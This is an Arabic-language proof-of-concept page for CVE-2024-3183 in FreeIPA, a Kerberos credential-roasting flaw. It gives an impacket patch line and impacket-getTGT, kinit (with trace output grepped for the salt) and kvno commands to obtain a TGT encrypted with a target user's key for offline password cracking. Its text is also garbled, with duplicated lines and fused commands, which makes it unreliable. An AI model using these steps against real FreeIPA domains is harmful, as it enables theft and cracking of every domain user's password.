
إثبات المفهوم لـ CVE-2024-3183 (FreeIPA Rosting)
إثبات مفهوم لـ CVE-2024-3183 (FreeIPA Rosting)
التأثير: يمكن لمستخدم ذي صلاحيات منخفضة الحصول على تجزئة (hash) لكلمات مرور جميع مستخدمي المجال وتنفيذ هجوم قوة عمياء غير متصل (kerberoasting).
تصحيح impacket-getTGT:
decoder.decode.defaultErrorState = stGetValueDecoderByTag إلى impacket/krb5/kerberosv5.py.decoder.decode.defaultErrorState = stGetValueDecoderByTag إلى impacket/krb5/kerberosv5.py.-service وخيار -debug للحصول على الملح (salt) في أمر واحد.
impacket-getTGT test.local/user -debug -service adminkinit user

printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt

kvno admin


1 - TGS، 2 - SALT، 3 - كلمات المرور.
kinit -S target userوستحصل على TGT مشفر بمفتاح المستخدم الهدف.